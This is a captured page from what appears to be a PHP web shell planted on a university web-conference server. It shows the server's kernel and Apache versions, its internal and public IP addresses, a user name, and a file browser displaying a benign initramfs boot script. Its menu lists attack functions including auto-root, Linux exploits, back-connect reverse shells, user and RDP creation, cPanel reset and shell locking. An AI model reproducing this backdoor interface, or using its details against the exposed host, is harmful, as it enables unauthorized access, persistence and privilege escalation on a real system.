Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.16.130.151
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
scripts /
init-top /
[ HOME SHELL ]
Name
Size
Permission
Action
all_generic_ide
384
B
-rwxr-xr-x
blacklist
519
B
-rwxr-xr-x
console_setup
3.34
KB
-rwxr-xr-x
framebuffer
3.16
KB
-rwxr-xr-x
udev
568
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blacklist
#!/bin/sh PREREQ="" prereqs() { echo "$PREREQ" } case $1 in # get pre-requisites prereqs) prereqs exit 0 ;; esac # blacklist vga16fb when vga= or video= given # shellcheck disable=SC2013 for x in $(cat /proc/cmdline); do case ${x} in vga=*|video=*) echo "blacklist vga16fb" >> /etc/modprobe.d/initramfs.conf ;; esac done # sanity check [ -z "${blacklist?}" ] && exit 0 # write blacklist to modprobe.d IFS=',' for b in ${blacklist}; do echo "blacklist $b" >> /etc/modprobe.d/initramfs.conf done
Close